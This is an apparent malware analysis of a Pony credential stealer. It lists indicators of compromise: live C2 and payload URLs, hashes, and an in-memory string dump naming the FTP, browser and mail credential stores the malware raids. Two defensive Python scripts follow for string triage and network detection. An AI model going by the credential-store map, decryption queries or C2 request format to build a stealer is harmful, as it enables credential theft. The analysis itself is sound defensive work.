- found by @neonprimetime security
- #pony #opendir #malware
- Subject: FW: Bank Copy
- Attachment: Bank Copy Confirmation.ppt
- Payload download: fusionpoint[.]pk/wptheme/nel/hawk.exe
- C2 gate: fusionpoint[.]pk/wptheme/nel/gate.php
- https://www.hybrid-analysis.com/sample/1ed23307f87ab31507a473474343880f50f982409f659a6c5b9919713028d0b5?environmentId=100
- https://app.any.run/tasks/e5bad6d9-4bf9-4041-8fc1-43ebe26762d3
- Bank Copy Confirmation.ppt (MD5 17b52e5811b23b6e4ddab049e01b6e7a)
- hxxp://fusionpoint[.]pk
- Hawk.exe (MD5 9F19E28B9127692C96B12A9CF46A8A7F)
- PAYMENT CONFIRMATION.exe (MD5 BE1A3FF797187F1C5DF0508D4197E3C2)
- 1351125.exe (MD5 9F19E28B9127692C96B12A9CF46A8A7F, same file as Hawk.exe)
- 1363343.bat
- interesting in-memory strings (offset (length): value)
- 0x64fe58 (42): http://fusionpoint.pk/wptheme/nel/gate.php
- 0x64ff58 (42): http://fusionpoint.pk/wptheme/nel/hawk.exe
- 0x65067a (243): POST %s HTTP/1.0
    Host: %s
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Content-Length: %lu
    Connection: close
    Content-Type: application/octet-stream
    Content-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 0x65076e (15): Content-Length:
- 0x650788 (155): GET %s HTTP/1.0
    Host: %s
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 0x650837 (50): {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
- 0x65086a (19): GetNativeSystemInfo
- 0x65087e (12): kernel32.dll
- 0x65088b (14): IsWow64Process
- 0x65089a (30): Software\Far\Plugins\FTP\Hosts
- 0x6508b9 (31): Software\Far2\Plugins\FTP\Hosts
- 0x6508d9 (38): Software\Far Manager\Plugins\FTP\Hosts
- 0x650900 (39): Software\Far\SavedDialogHistory\FTPHost
- 0x650928 (40): Software\Far2\SavedDialogHistory\FTPHost
- 0x650951 (47): Software\Far Manager\SavedDialogHistory\FTPHost
- 0x65099d (11): wcx_ftp.ini
- 0x6509b2 (10): InstallDir
- 0x6509bd (10): FtpIniName
- 0x6509c8 (34): Software\Ghisler\Windows Commander
- 0x6509eb (32): Software\Ghisler\Total Commander
- 0x650a1d (16): \Ipswitch\WS_FTP
- 0x650a60 (45): Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
- 0x650a8e (53): Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
- 0x650ac4 (45): Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
- 0x650af2 (53): Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
- 0x650b28 (45): Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
- 0x650b56 (53): Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
- 0x650b8c (20): \GlobalSCAPE\CuteFTP
- 0x650ba1 (24): \GlobalSCAPE\CuteFTP Pro
- 0x650bba (25): \GlobalSCAPE\CuteFTP Lite
- 0x650be5 (19): Software\FlashFXP\3
- 0x650bf9 (17): Software\FlashFXP
- 0x650c0b (19): Software\FlashFXP\4
- 0x650c1f (17): InstallerDathPath
- 0x650c36 (12): Install Path
- 0x650c43 (10): DataFolder
- 0x650c4e (10): \Sites.dat
- 0x650c59 (10): \Quick.dat
- 0x650c64 (12): \History.dat
- 0x650c71 (11): \FlashFXP\3
- 0x650c7d (11): \FlashFXP\4
- 0x650c89 (10): \FileZilla
- 0x650c94 (16): \sitemanager.xml
- 0x650ca5 (18): \recentservers.xml
- 0x650cb8 (14): \filezilla.xml
- 0x650cc7 (18): Software\FileZilla
- 0x650cda (25): Software\FileZilla Client
- 0x650cf4 (11): Install_Dir
- 0x650d14 (10): Remote Dir
- 0x650d1f (11): Server Type
- 0x650d2b (11): Server.Host
- 0x650d37 (11): Server.User
- 0x650d43 (11): Server.Pass
- 0x650d4f (11): Server.Port
- 0x650d60 (10): ServerType
- 0x650d6b (16): Last Server Host
- 0x650d7c (16): Last Server User
- 0x650d8d (16): Last Server Pass
- 0x650d9e (16): Last Server Port
- 0x650daf (16): Last Server Path
- 0x650dc0 (16): Last Server Type
- 0x650dd1 (13): FTP Navigator
- 0x650ddf (13): FTP Commander
- 0x650ded (11): ftplist.txt
- 0x650df9 (21): \BulletProof Software
- 0x650e19 (36): Software\BPFTP\Bullet Proof FTP\Main
- 0x650e3e (57): Software\BulletProof Software\BulletProof FTP Client\Main
- 0x650e78 (39): Software\BPFTP\Bullet Proof FTP\Options
- 0x650ea0 (60): Software\BulletProof Software\BulletProof FTP Client\Options
- 0x650edd (14): Software\BPFTP
- 0x650eec (15): LastSessionFile
- 0x650f05 (11): InstallDir1
- 0x650f20 (13): Favorites.dat
- 0x650f2e (11): History.dat
- 0x650f3a (10): addrbk.dat
- 0x650f59 (17): Software\TurboFTP
- 0x650f6b (11): installpath
- 0x650f77 (19): Software\Sota\FFFTP
- 0x650f8b (14): CredentialSalt
- 0x650f9a (15): CredentialCheck
- 0x650faa (27): Software\Sota\FFFTP\Options
- 0x651010 (11): HostDirName
- 0x65101c (45): Software\CoffeeCup Software\Internet\Profiles
- 0x65104a (30): Software\FTPWare\COREFTP\Sites
- 0x651084 (12): profiles.xml
- 0x651091 (13): \FTP Explorer
- 0x65109f (59): Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
- 0x6510e3 (30): Software\FTP Explorer\Profiles
- 0x65110b (12): PasswordType
- 0x651128 (11): InitialPath
- 0x651134 (11): FtpSite.xml
- 0x65114f (24): _VanDyke\Config\Sessions
- 0x651172 (25): Software\VanDyke\SecureFX
- 0x65118c (11): Config Path
- 0x6511a1 (10): \sites.xml
- 0x6511b5 (12): RushSite.xml
- 0x6511e3 (31): Software\Cryer\WebSitePublisher
- 0x65120d (11): bitkinex.ds
- 0x651239 (28): Software\ExpanDrive\Sessions
- 0x651256 (11): \ExpanDrive
- 0x651262 (10): \drives.js
- 0x65126d (14): "password" : "
- 0x65127f (19): Software\ExpanDrive
- 0x651293 (15): ExpanDrive_Home
- 0x6512d0 (44): Software\NCH Software\ClassicFTP\FTPAccounts
- 0x651307 (11): FtpUserName
- 0x651313 (11): FtpPassword
- 0x65131f (12): _FtpPassword
- 0x65132c (12): FtpDirectory
- 0x651339 (36): SOFTWARE\NCH Software\Fling\Accounts
- 0x65135e (24): Software\FTPClient\Sites
- 0x651377 (34): Software\SoftX.org\FTPClient\Sites
- 0x6513a4 (11): ftplast.osd
- 0x6513b0 (26): \GPSoftware\Directory Opus
- 0x6513cb (19): \SharedSettings.ccs
- 0x6513df (25): \SharedSettings_1_0_5.ccs
- 0x6513f9 (22): \SharedSettings.sqlite
- 0x651410 (28): \SharedSettings_1_0_5.sqlite
- 0x65142d (19): \CoffeeCup Software
- 0x651449 (10): unleap.exe
- 0x651468 (17): \LeapWare\LeapFTP
- 0x65147a (17): SOFTWARE\LeapWare
- 0x65148c (11): InstallPath
- 0x6514bb (15): RemoteDirectory
- 0x6514cb (10): PortNumber
- 0x6514d6 (10): FSProtocol
- 0x6514e1 (23): Software\Martin Prikryl
- 0x6514f9 (13): \32BitFtp.ini
- 0x651507 (11): NDSites.ini
- 0x651533 (13): RootDirectory
- 0x651546 (54): Software\South River Technologies\WebDrive\Connections
- 0x65157d (10): ServerType
- 0x651588 (11): FTP CONTROL
- 0x6515dc (24): _Software\Opera Software
- 0x6515f5 (15): Last Directory3
- 0x651605 (17): Last Install Path
- 0x651617 (29): Opera.HTML\shell\open\command
- 0x651635 (15): wiseftpsrvs.bin
- 0x65164d (15): Software\AceBIT
- 0x651661 (63): SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
- 0x6516a1 (63): SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
- 0x6516e1 (15): wiseftpsrvs.ini
- 0x6516f1 (11): wiseftp.ini
- 0x6516fd (14): FTPVoyager.ftp
- 0x65170c (13): FTPVoyager.qc
- 0x65171a (14): \RhinoSoft.com
- 0x65173b (12): NSS_Shutdown
- 0x651748 (22): NSSBase64_DecodeBuffer
- 0x65175f (16): SECITEM_FreeItem
- 0x651770 (23): PK11_GetInternalKeySlot
- 0x651788 (17): PK11_Authenticate
- 0x65179a (15): PK11SDR_Decrypt
- 0x6517aa (13): PK11_FreeSlot
- 0x6517d9 (11): sqlite3.dll
- 0x6517e5 (12): sqlite3_open
- 0x6517f2 (13): sqlite3_close
- 0x651800 (15): sqlite3_prepare
- 0x651810 (12): sqlite3_step
- 0x65181d (20): sqlite3_column_bytes
- 0x651832 (19): sqlite3_column_blob
- 0x651847 (14): mozsqlite3.dll
- 0x651856 (12): sqlite3_open
- 0x651863 (13): sqlite3_close
- 0x651871 (15): sqlite3_prepare
- 0x651881 (12): sqlite3_step
- 0x65188e (20): sqlite3_column_bytes
- 0x6518a3 (19): sqlite3_column_blob
- 0x6518d8 (12): profiles.ini
- 0x6518ed (10): IsRelative
- 0x651910 (14): signons.sqlite
- 0x65191f (11): signons.txt
- 0x65192b (12): signons2.txt
- 0x651938 (12): signons3.txt
- 0x651951 (69): SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
- 0x65199f (17): \Mozilla\Firefox\
- 0x6519b1 (16): Software\Mozilla
- 0x6519e3 (16): fireFTPsites.dat
- 0x6519fe (19): \Mozilla\SeaMonkey\
- 0x651a18 (15): \Flock\Browser\
- 0x651a30 (18): \Mozilla\Profiles\
- 0x651a43 (17): Software\LeechFTP
- 0x651a65 (12): bookmark.dat
- 0x651a72 (12): SiteInfo.QFP
- 0x651a84 (13): Favorites.dat
- 0x651aa2 (59): CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
- 0x651ade (11): servers.xml
- 0x651aea (10): \FTPGetter
- 0x651af5 (10): ESTdb2.dat
- 0x651b0a (14): \Estsoft\ALFTP
- 0x651b19 (17): Internet Explorer
- 0x651b2b (23): WininetCacheCredentials
- 0x651b43 (19): MS IE FTP Passwords
- 0x651b98 (58): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
- 0x651bd3 (48): http://www.facebook.com/
- 0x651c09 (72): abe2869f-9b47-4cd9-a358-c22904dba7f7
- 0x651c53 (19): Microsoft_WinInet_*
- 0x651c6e (21): Software\Adobe\Common
- 0x651c84 (11): SiteServers
- 0x651c90 (18): SiteServer %d\Host
- 0x651ca3 (20): SiteServer %d\WebUrl
- 0x651cb8 (30): SiteServer %d\Remote Directory
- 0x651cd7 (18): SiteServer %d-User
- 0x651cea (21): SiteServer %d-User PW
- 0x651d00 (11): %s\Keychain
- 0x651d0c (18): SiteServer %d\SFTP
- 0x651d3c (10): Login Data
- 0x651d47 (15): SQLite format 3
- 0x651d63 (10): CONSTRAINT
- 0x651d93 (10): origin_url
- 0x651d9e (14): password_value
- 0x651dad (14): username_value
- 0x651dd4 (14): \Google\Chrome
- 0x651ded (11): \ChromePlus
- 0x651df9 (19): Software\ChromePlus
- 0x651e0d (11): Install_Dir
- 0x651e60 (10): \Epic\Epic
- 0x651e86 (14): \Visicom Media
- 0x651eac (18): \Global Downloader
- 0x651ee7 (12): LastPassword
- 0x651ef4 (11): LastAddress
- 0x651f12 (36): Software\FlashPeak\BlazeFtp\Settings
- 0x651f46 (29): FTP++.Link\shell\open\command
- 0x651f6a (15): Connections.txt
- 0x651f93 (13): \SiteDesigner
- 0x651fa1 (75): SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
- 0x651ff5 (10): \NetSarang
- 0x652014 (14): password 51:b:
- 0x652023 (11): username:s:
- 0x65202f (15): full address:s:
- 0x652063 (29): SOFTWARE\Robo-FTP 3.7\Scripts
- 0x652081 (32): SOFTWARE\Robo-FTP 3.7\FTPServers
- 0x6520ac (10): FTP File%d
- 0x6520c0 (10): ServerName
- 0x6520d2 (16): InitialDirectory
- 0x6520e3 (10): PortNumber
- 0x6520ee (10): ServerType
- 0x65212b (30): Software\LinasFTP\Site Manager
- 0x65215e (10): Remote Dir
- 0x652169 (10): \Cyberduck
- 0x65217a (11): user.config
- 0x652186 (15): <setting name="
- 0x6521a0 (35): Software\SimonTatham\PuTTY\Sessions
- 0x6521df (10): PortNumber
- 0x6521ea (12): TerminalType
- 0x6521f7 (10): NppFTP.xml
- 0x652202 (10): \Notepad++
- 0x65220d (27): Software\CoffeeCup Software
- 0x652229 (22): FTP destination server
- 0x652240 (20): FTP destination user
- 0x652255 (24): FTP destination password
- 0x65226e (20): FTP destination port
- 0x652283 (23): FTP destination catalog
- 0x65229b (12): FTP profiles
- 0x6522b1 (12): ftpshell.fsi
- 0x6522be (31): Software\MAS-Soft\FTPInfo\Setup
- 0x6522ef (14): ServerList.xml
- 0x652308 (11): ftpsite.ini
- 0x652314 (17): FastStone Browser
- 0x652326 (10): FTPList.db
- 0x652331 (23): \MapleStudio\ChromePlus
- 0x652349 (38): Software\Nico Mak Computing\WinZip\FTP
- 0x652370 (43): Software\Nico Mak Computing\WinZip\mru\jobs
- 0x6523db (11): project.ini
- 0x6523ec (38): {74FF1730-B1F2-4D88-926B-1568FAE61DB7}
- 0x652413 (10): NovaFTP.db
- 0x65241e (19): \INSoftware\NovaFTP
- 0x652432 (10): .oeaccount
- 0x65244f (15): <POP3_Password2
- 0x65245f (15): <SMTP_Password2
- 0x65246f (15): <IMAP_Password2
- 0x65247f (19): <HTTPMail_Password2
- 0x652494 (28): \Microsoft\Windows Live Mail
- 0x6524b1 (36): Software\Microsoft\Windows Live Mail
- 0x6524d6 (23): \Microsoft\Windows Mail
- 0x6524ee (31): Software\Microsoft\Windows Mail
- 0x65250e (28): Software\RimArts\B2\Settings
- 0x652533 (10): DataDirBak
- 0x65253e (11): Mailbox.ini
- 0x65254a (25): Software\Poco Systems Inc
- 0x652569 (15): \PocoSystem.ini
- 0x65258a (12): accounts.ini
- 0x6525a1 (20): Software\IncrediMail
- 0x6525b6 (12): EmailAddress
- 0x6525c3 (10): Technology
- 0x6525e0 (10): PopAccount
- 0x6525eb (11): PopPassword
- 0x6525f7 (10): SmtpServer
- 0x65260b (11): SmtpAccount
- 0x652617 (12): SmtpPassword
- 0x652624 (11): account.cfg
- 0x652630 (11): account.cfn
- 0x65264f (21): Software\RIT\The Bat!
- 0x652665 (33): Software\RIT\The Bat!\Users depot
- 0x652687 (17): Working Directory
- 0x652699 (10): ProgramDir
- 0x6526ba (18): SMTP Email Address
- 0x6526cd (11): SMTP Server
- 0x6526d9 (11): POP3 Server
- 0x6526e5 (14): POP3 User Name
- 0x6526f4 (14): SMTP User Name
- 0x652703 (18): NNTP Email Address
- 0x652716 (14): NNTP User Name
- 0x652725 (11): NNTP Server
- 0x652731 (11): IMAP Server
- 0x65273d (14): IMAP User Name
- 0x65275c (15): HTTP Server URL
- 0x652780 (18): HTTPMail User Name
- 0x652793 (15): HTTPMail Server
- 0x6527cd (14): POP3 Password2
- 0x6527dc (14): IMAP Password2
- 0x6527eb (14): NNTP Password2
- 0x6527fa (18): HTTPMail Password2
- 0x65280d (14): SMTP Password2
- 0x65281d (13): POP3 Password
- 0x65282b (13): IMAP Password
- 0x652839 (13): NNTP Password
- 0x652847 (13): HTTP Password
- 0x652855 (13): SMTP Password
- 0x652864 (52): Software\Microsoft\Internet Account Manager\Accounts
- 0x652899 (10): Identities
- 0x6528a4 (62): Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
- 0x6528e3 (117): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
- 0x652959 (89): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- 0x6529b3 (43): Software\Microsoft\Internet Account Manager
- 0x6529f1 (14): identification
- 0x652a00 (11): identitymgr
- 0x652a0c (25): inetcomm server passwords
- 0x652a26 (33): outlook account manager passwords
- 0x652a48 (10): identities
- 0x652a53 (50): {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
- 0x652a86 (11): Thunderbird
- 0x652a92 (12): \Thunderbird
- 0x652aa9 (11): ftplist.txt
- 0x652c4d (11): Client Hash
- 0x652c59 (16): STATUS-IMPORT-OK
- 0x652c86 (13): "%s"
- 0x652c94 (13): ShellExecuteA
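Triage of a string dump like the one above, as an added example (not code from the paste, from @neonprimetime, or from Pony itself). It extracts printable ASCII runs from a memory blob in the same "offset (length): value" form, then groups hits against indicator substrings copied verbatim from the dump: the gate.php POST template and User-Agent, FTP client registry paths, the Firefox NSS decrypt exports and moz_logins query, Chrome's Login Data columns, and mail client keys. The category names, the 10-byte minimum length, the "three categories plus a C2 template" verdict threshold, and the sample blob (glued together by hand, so its offsets are not the paste's) are all my assumptions.

```python
"""Triage in-memory strings against Pony-style credential-stealer indicators.

Added example, not part of the original paste or of the Pony codebase.
SAMPLE is constructed for the demo; INDICATORS are substrings copied from
the dump, grouped under category names of my own choosing.
"""
import re
from collections import defaultdict

MIN_LEN = 10  # every string in the dump is >= 10 bytes; same floor here (assumption)

# Substrings taken verbatim from the dump, grouped by what they tell an analyst.
INDICATORS = {
    "c2_gate":       ["/gate.php", "POST %s HTTP/1.0", "Content-Encoding: binary"],
    "legacy_ua":     ["Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"],
    "ftp_clients":   ["Software\\FlashFXP", "\\FileZilla", "sitemanager.xml",
                      "Software\\GlobalSCAPE\\CuteFTP",
                      "Software\\SimonTatham\\PuTTY\\Sessions"],
    "firefox_nss":   ["PK11SDR_Decrypt", "NSSBase64_DecodeBuffer",
                      "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins"],
    "chrome_logins": ["Login Data", "password_value", "username_value"],
    "mail_clients":  ["Software\\RimArts\\B2\\Settings", "Software\\IncrediMail",
                      "Software\\Microsoft\\Internet Account Manager\\Accounts"],
}

_PRINTABLE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)


def extract_strings(blob: bytes, base: int = 0):
    """Yield (address, text) for printable ASCII runs of MIN_LEN or more.
    `base` is the virtual address of blob[0], so output mirrors the dump."""
    for m in _PRINTABLE.finditer(blob):
        yield base + m.start(), m.group().decode("ascii")


def format_like_dump(blob: bytes, base: int = 0):
    """Render strings as '0xOFFSET (len): value', the dump's own layout."""
    return ["0x%x (%d): %s" % (off, len(s), s) for off, s in extract_strings(blob, base)]


def classify(blob: bytes):
    """Map category -> sorted list of indicator substrings seen in the blob."""
    hits = defaultdict(set)
    for _, s in extract_strings(blob):
        for cat, needles in INDICATORS.items():
            for needle in needles:
                if needle in s:
                    hits[cat].add(needle)
    return {cat: sorted(v) for cat, v in hits.items()}


def looks_like_pony(blob: bytes, min_categories: int = 3):
    """Heuristic verdict (assumption): a C2 gate template plus credential-store
    strings spanning several application families, as in the dump above."""
    hits = classify(blob)
    return "c2_gate" in hits and len(hits) >= min_categories


# Constructed sample: a few dump strings separated by binary filler.
SAMPLE = (b"\x00\x01\x02MZ\x90\x00"
          b"http://fusionpoint.pk/wptheme/nel/gate.php\x00\x00"
          b"POST %s HTTP/1.0\r\nHost: %s\r\n"
          b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\x00"
          b"\xff\xfe\x00Software\\FlashFXP\\4\x00\\FileZilla\x00\\sitemanager.xml\x00"
          b"PK11SDR_Decrypt\x00"
          b"SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins\x00"
          b"Login Data\x00password_value\x00\x00\x00")

if __name__ == "__main__":
    for line in format_like_dump(SAMPLE, base=0x64fe58):
        print(line)
    print(classify(SAMPLE))
    print("pony-like:", looks_like_pony(SAMPLE))
```

Point it at a process memory dump or an unpacked section rather than the packed file on disk; the paste's strings were read from memory, and a packed Hawk.exe on disk will show almost none of them.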
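Network-side detection for the two request templates in the dump (the HTTP/1.0 POST to the gate and the HTTP/1.0 GET used for the hawk.exe download), as an added example that is not from the paste or from Pony. The templates fix the header set, the header order, and every value except Host, the path and Content-Length, so the check below requires an exact header-order match rather than matching on the User-Agent alone. The three request strings are constructed from the templates (no traffic was captured), and the labels and the "suspicious_ua" fallback are my own.

```python
"""Classify raw HTTP requests against the Pony POST/GET templates seen in memory.

Added example, not from the paste or from Pony. The requests below are
constructed from the dump's printf templates; nothing here was captured.
"""

PONY_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"

# Values the templates hard-code (Host, path and Content-Length are filled in at runtime).
FIXED_VALUES = {
    "accept": "*/*",
    "accept-encoding": "identity, *;q=0",
    "connection": "close",
    "content-type": "application/octet-stream",
    "content-encoding": "binary",
    "user-agent": PONY_UA,
}

# Header names in the exact order each template emits them.
TEMPLATES = {
    "POST": ["host", "accept", "accept-encoding", "content-length",
             "connection", "content-type", "content-encoding", "user-agent"],
    "GET":  ["host", "accept", "accept-encoding", "connection", "user-agent"],
}


def parse_request(raw: str):
    """Return (method, path, version, header_names_in_order, header_values)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, version = lines[0].split(" ", 2)
    names, values = [], {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name = name.strip().lower()
        names.append(name)
        values[name] = value.strip()
    return method, path, version, names, values


def classify_request(raw: str):
    """Return (label, reasons). Labels (my own): pony_checkin, pony_download,
    suspicious_ua, benign."""
    method, path, version, names, values = parse_request(raw)
    reasons = []
    if version == "HTTP/1.0":
        reasons.append("HTTP/1.0 request line")
    if values.get("user-agent") == PONY_UA:
        reasons.append("hard-coded Pony User-Agent")
    order = TEMPLATES.get(method)
    template_hit = (
        order is not None
        and names == order
        and all(values.get(k) == v for k, v in FIXED_VALUES.items() if k in order)
    )
    if template_hit:
        reasons.append("header set and order match the %s template exactly" % method)
    if template_hit and method == "POST" and version == "HTTP/1.0":
        label = "pony_checkin"
    elif template_hit and method == "GET" and version == "HTTP/1.0":
        label = "pony_download"
    elif values.get("user-agent") == PONY_UA:
        label = "suspicious_ua"
    else:
        label = "benign"
    return label, reasons


# Constructed from the POST template; the body is a placeholder, not a real report.
CHECKIN = (
    "POST /wptheme/nel/gate.php HTTP/1.0\r\n"
    "Host: fusionpoint.pk\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Content-Length: 412\r\n"
    "Connection: close\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    "\r\n"
    "<412 bytes of report body>"
)
# Constructed from the GET template.
DOWNLOAD = (
    "GET /wptheme/nel/hawk.exe HTTP/1.0\r\n"
    "Host: fusionpoint.pk\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    "\r\n"
)
# Ordinary browser request (constructed) for contrast.
BROWSER = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, req in (("checkin", CHECKIN), ("download", DOWNLOAD), ("browser", BROWSER)):
        print(name, classify_request(req))
```

The User-Agent string is also used by some legitimate legacy software, which is why a UA-only hit is reported as suspicious_ua rather than as a Pony check-in; the full header-order match is what carries the verdict.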